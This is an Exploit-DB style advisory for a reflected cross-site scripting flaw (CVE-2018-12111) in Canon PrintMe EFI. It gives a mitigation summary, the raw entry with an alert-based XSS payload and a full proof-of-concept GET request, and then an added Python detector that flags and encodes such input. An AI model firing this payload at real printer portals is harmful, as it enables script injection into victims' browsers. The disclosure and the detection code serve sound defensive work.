Vendor: PrintMe EFI
By: Huy Kha
CVSS: 6.1 MEDIUM
CWE: 79 (Cross-Site Scripting)
Product Name: PrintMe EFI
Affected Version From: Canon PrintMe EFI
Affected Version To: Canon PrintMe EFI
Patch Exists: NO
Related CWE: CVE-2018-12111
CPE: a:canon:printme_efi
Metasploit:
Other Scripts:
Platforms Tested: Mozilla FireFox
2018

Canon PrintMe EFI – Cross-Site Scripting

Canon PrintMe EFI is affected by a cross-site scripting (XSS) vulnerability that allows an attacker to inject malicious code into the application. The vulnerability is triggered when the application fails to properly sanitize user input, allowing an attacker to execute arbitrary JavaScript code in the context of the victim's browser.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques in the Canon PrintMe EFI application. Additionally, the use of Content Security Policy (CSP) can help prevent the execution of malicious scripts.

Exploit-DB raw data:

# Title: Canon PrintMe EFI - Cross-Site Scripting	 
# Date: 2018-06-09
# Exploit Author: Huy Kha	
# Vendor Homepage: https://www.efi.com/
# Version: Canon PrintMe EFI	
# Tested on: Mozilla FireFox 
# CVE: CVE-2018-12111
# XSS Payload used: '"--!><img src=x onerror=alert("XSS")>
	
# PoC
	
GET /wt3/mydocs.php/'%22--!%3E%3Cimg%20src=x%20onerror=alert(%22XSS%22)%3E HTTP/1.1
Host: 129.25.8.177
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=a11b2588fe327f6bd1acf79f286c2dcd
Connection: close
Upgrade-Insecure-Requests: 1
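
Added example, not part of the Exploit-DB entry or the vendor's code: a Python check that pulls the percent-decoded path segment following a .php script name out of HTTP request lines (where the PoC above carries its payload), flags HTML metacharacters in it, and applies the output encoding the mitigation section calls for. The function names and every sample line except the PoC request line are assumptions constructed for this example.

```python
import html
import re
from urllib.parse import unquote

# Script name followed by extra path segments (PATH_INFO), before any query string.
PHP_PATH_INFO = re.compile(r"^/[^?#]*?\.php(?P<info>/[^?#]*)")
# Characters that let a reflected value break out of HTML text or an attribute.
HTML_META = re.compile(r"[<>\"'`]")


def path_info(request_line, rounds=3):
    """Return the percent-decoded PATH_INFO of 'METHOD target HTTP/x', or None."""
    _method, _, rest = request_line.partition(" ")
    target, _, version = rest.rpartition(" ")
    match = PHP_PATH_INFO.match(target) if version.startswith("HTTP/") else None
    if match is None:
        return None
    value = match.group("info")
    for _ in range(rounds):  # undo nested encoding such as %253C -> %3C -> <
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_requests(request_lines):
    """Return (line, decoded PATH_INFO) pairs whose PATH_INFO carries HTML metacharacters."""
    hits = []
    for line in request_lines:
        info = path_info(line)
        if info is not None and HTML_META.search(info):
            hits.append((line, info))
    return hits


def encode_for_html(value):
    """Output-encode a request-derived value before writing it into a page."""
    return html.escape(value, quote=True)


# First line is the request line from the PoC on this page; the rest are constructed.
SAMPLES = [
    "GET /wt3/mydocs.php/'%22--!%3E%3Cimg%20src=x%20onerror=alert(%22XSS%22)%3E HTTP/1.1",
    "GET /wt3/mydocs.php HTTP/1.1",
    "GET /wt3/mydocs.php/list?sort=name HTTP/1.1",
    "GET /wt3/mydocs.php/%253Cb%253E HTTP/1.1",
]

if __name__ == "__main__":
    for line, info in flag_requests(SAMPLES):
        print("suspicious:", info, "->", encode_for_html(info))
```

Matching on the decoded value rather than the raw request line is what catches the double-encoded sample; a filter that only looks for a literal "<" or "%3C" in the log would miss it.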